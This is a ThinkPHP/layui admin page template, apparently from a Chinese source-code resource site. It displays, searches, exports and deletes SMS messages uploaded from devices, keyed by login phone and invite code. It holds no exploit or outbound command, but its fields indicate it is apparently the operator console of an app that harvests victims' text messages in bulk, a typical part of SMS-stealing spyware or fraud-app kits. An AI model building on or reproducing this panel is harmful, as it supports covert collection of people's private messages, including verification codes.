<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>layui  -abnm a.com 搬 码资源网</title>
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="__PUBLIC__/layui/css/layui.css"  media="all">
  <link rel="stylesheet" href="__PUBLIC__/font-awesome/css/font-awesome.min.css" media="all" />
  <link rel="stylesheet" href="__CSS__/admin.css"  media="all">
  <style type="text/css">
/* tooltip */
#tooltip{
  position:absolute;
  border:1px solid #ccc;
  background:#333;
  padding:2px;
  display:none;
  color:#fff;
}
</style>
</head>
<body style="padding:10px;">
  <div class="tplay-body-div">
    <div class="layui-tab">
      <ul class="layui-tab-title">
        <li class="layui-this">短信数据查看管理</li>
      </ul>
    </div> 
    <form class="layui-form serch" action="{:url('admin/appv1/sms')}" method="post">
        <div class="layui-form-item" style="float: left;">
          <div class="layui-input-inline">
            <input type="text" name="keywords" lay-verify="title" autocomplete="off" placeholder="请输入登录手机" class="layui-input layui-btn-sm">
          </div>
          <div class="layui-input-inline">
            <input type="text" name="code" lay-verify="title" autocomplete="off" placeholder="请输入邀请码" class="layui-input layui-btn-sm">
          </div>           
          <div class="layui-input-inline">
            <input type="text" name="smstel" lay-verify="title" autocomplete="off" placeholder="请输入短信号码" class="layui-input layui-btn-sm">
          </div>          
          <div class="layui-input-inline">
            <div class="layui-inline">
              <div class="layui-input-inline">
                <input type="text" class="layui-input" id="create_time" placeholder="短信上传时间" name="create_time">
              </div>
            </div>
          </div>
          <button class="layui-btn layui-btn-danger layui-btn-sm" lay-submit="" lay-filter="serch">立即提交</button>
        </div>
      </form> 
    <table class="layui-table" lay-size="sm">
      <colgroup>
        <col width="50">
        <col width="100">
        <col width="50">
        <col width="40">
        <col width="70">
        <col width="200">
        <col width="100"> 
        <col width="100">          
        <col width="400">
      </colgroup>
      <thead>
        <tr>
          <th>ID</th>
          <th>设备名称</th>
          <th>登录手机</th>          
          <th>邀请码</th>          
		  <th>短信号码</th>
		  <th>短信内容</th>
		  <th>短信发送时间</th>		  
          <th>最后上传时间</th>
          <th>操作</th>
        </tr> 
      </thead>
      <tbody>
        {volist name="info" id="vo"}
        <tr>
          <td>{$vo.id}</td>
          <td>{$vo.clientid}</td>          
          <td>{$vo.name}</td>
          <td>{$vo.code}</td>
          <td>{$vo.smstel}</td>          
          <td>{$vo.smscontent}</td>          
          <td>{$vo.smstime}</td>          
          <td>{$vo.addtime|date="Y-m-d H:i:s",###}</td>
          <td class="operation-menu">
            <div class="layui-btn-group">
              <a href="{:url('appv1/smsexcel',['id'=>$vo.userid])}" class="layui-btn layui-btn-xs a_menu layui-btn-primary" title="下载此设备的短信数据" alt="下载此设备的短信数据" style="margin-right: 0;font-size:12px;"><i class="fa fa-download"></i></a>
              <a class="layui-btn layui-btn-xs layui-btn-primary delete" id="{$vo.id}" title="删除数据" alt="删除数据" style="margin-right: 0;font-size:12px;"><i class="layui-icon"></i></a>
            </div>
          </td>
        </tr>
        {/volist}
      </tbody>
    </table>
    <div style="padding:0 20px;">{$info->render()}</div>

    {include file="public/foot"}
    
    <script type="text/javascript">
    $('.delete').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要删除此条短信数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/smsdelete')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    })
    </script>
  </div>
</body>
</html>
